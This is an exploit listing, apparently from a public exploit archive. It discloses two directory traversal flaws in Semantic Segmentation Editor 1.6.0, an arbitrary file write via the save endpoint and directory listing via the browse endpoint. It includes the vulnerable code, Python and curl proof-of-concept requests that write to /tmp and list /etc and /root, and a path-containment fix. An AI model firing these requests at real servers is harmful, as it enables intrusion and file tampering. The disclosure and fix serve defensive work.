## https://sploitus.com/exploit?id=PACKETSTORM:189845
**Exploit Title:** Semantic Segmentation Editor 1.6.0 - Directory Traversal File Upload
**Date:** 2025-03-14
**Exploit Author:** Fatih Türüt ([defendzero.com](https://defendzero.com))
**Vendor Homepage:** [Hitachi Automotive & Industry Lab](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor)
**Software Download:** [Semantic Segmentation Editor 1.6.0](https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip)
**Version:** 1.6.0
**Tested on:** macOS 24.3.0
**Category:** Webapps
**CVE:** N/A
---
## **Description:**
A **directory traversal vulnerability** exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation in the file upload functionality.
This flaw allows an attacker to manipulate file paths and write arbitrary files outside the intended directory on the server.
### **Vulnerable Component:**
- **File:** `server/main.js`
- **Function:** `'saveData'(sample)`
- **Issue:** User input is decoded and processed without validating whether the file remains inside the allowed directory.
### **Vulnerable Code:**
```javascript
'saveData'(sample) {
    if (demoMode) return;
    const attrs = url.parse(sample.url);
    let path = decodeURIComponent(attrs.pathname);
    sample.folder = path.substring(1, path.lastIndexOf("/"));
    sample.file = path.substring(path.lastIndexOf("/") + 1);
    // No path validation is performed
}
```
---
## **Proof of Concept (PoC):**
An attacker can exploit this vulnerability by crafting a request to save files outside the intended directory.
### **Exploit Script (Python)**
```python
import requests
# Target file path
target_path = "../../../tmp/malicious.txt"
encoded_path = target_path.replace("../", "%2f..%2f")
url = f"http://target:3000/save/{encoded_path}"
content = "Malicious content here"
# Send content directly
response = requests.post(url, data=content)
print(response.text)
```
---
### **Example curl Command:**
```bash
curl -X POST -d "Malicious content here" "http://target:3000/save/%2f..%2f..%2f..%2ftmp%2fmalicious.txt"
```
---
## **Impact:**
Successful exploitation allows an attacker to write arbitrary files to the server, potentially leading to remote code execution (RCE) if an executable file is placed in a web-accessible directory.
### **Mitigation:**
The vendor should implement proper path validation and restrict file writes to the intended directory using functions like `path.resolve()` or `path.normalize()` in Node.js.
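
One way to implement that check, as an added example that is not code from the project or the advisory author: decode once, resolve against the base directory, and verify the result is still inside it. Normalizing alone does not confine a path, so the containment test is the part that matters. `BASE_DIR`, `resolveInside` and `isAllowed` are hypothetical names, and the base path is a constructed sample value.

```javascript
// Added example (not the project's code). BASE_DIR and the function names
// are hypothetical; the directory is a constructed sample value.
const path = require("path");

const BASE_DIR = path.resolve("/srv/sse/images"); // assumed storage root

// Resolve a user-supplied, possibly URL-encoded path under baseDir.
// Throws if the result would land outside baseDir.
function resolveInside(baseDir, userPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(userPath); // decode exactly once
  } catch (e) {
    throw new Error("malformed percent-encoding");
  }
  if (decoded.includes("\0")) throw new Error("NUL byte in path");

  // Drop leading separators so the input is always treated as relative,
  // then let path.resolve() collapse "." and ".." segments.
  const candidate = path.resolve(baseDir, decoded.replace(/^[/\\]+/, ""));

  // Containment: the relative path from base to candidate must not climb
  // out of base. Comparing on ".." + separator (not a bare string prefix)
  // keeps names like "..foo" legal and rejects siblings like "images-backup".
  const rel = path.relative(baseDir, candidate);
  const escapes = rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel);
  if (rel === "" || escapes) { // "" is the base directory itself, not a file
    throw new Error("path escapes base directory");
  }
  return candidate;
}

// Boolean wrapper for use in a request handler before any fs call.
function isAllowed(userPath) {
  try {
    resolveInside(BASE_DIR, userPath);
    return true;
  } catch (e) {
    return false;
  }
}
```

A handler would call `resolveInside()` first and pass only its return value to the filesystem API, rejecting the request on any thrown error.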
---
----------------------------------------
Title: Semantic Segmentation Editor 1.6.0 - Directory Traversal Vulnerability
Description:
A directory traversal vulnerability exists in **Semantic Segmentation Editor 1.6.0** due to improper path validation. An attacker can manipulate the directory browsing endpoint to list arbitrary directories on the server.
Source URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor
Source Name/Email: Halil İbrahim İlhan (halil@defendzero.com)
CVEs: N/A
Software URL: https://github.com/Hitachi-Automotive-And-Industry-Lab/semantic-segmentation-editor/archive/refs/tags/1.6.0.zip
Vulnerable Component:
- **File:** server/main.js
- **Function:** 'images'(folder, pageIndex, pageLength)
- **Issue:** The application decodes user input without validating if it stays within the intended directory scope.
Vulnerable Code:
```javascript
'images'(folder, pageIndex, pageLength) {
    const folderSlash = folder ? decodeURIComponent(folder) + "/" : "/";
    const leaf = join(config.imagesFolder, (folderSlash ? folderSlash : ""));
    // No path validation is performed before accessing the directory
    const dirs = getDirectories(leaf);
    const images = getImages(leaf);
}
```
### **Proof of Concept (PoC):**
An attacker can exploit this vulnerability by sending specially crafted requests. The following Python script demonstrates the exploitation of the vulnerability:
```python
import requests

def list_directory(path):
    """Exploit for directory traversal vulnerability in Semantic Segmentation Editor 1.6.0."""
    encoded_path = path.replace("../", "%2f..%2f")
    url = f"http://target:3000/browse/0/20/{encoded_path}"
    response = requests.get(url)
    print(f"Listing contents of: {path}")
    return response.text

if __name__ == "__main__":
    print(list_directory("../../../etc"))   # List /etc directory
    print(list_directory("../../../root"))  # List /root directory
```
### **Example curl commands:**
```bash
# List /etc directory
curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2fetc"
# List /root directory
curl -i "http://target:3000/browse/0/20/%2f..%2f..%2f..%2froot"
```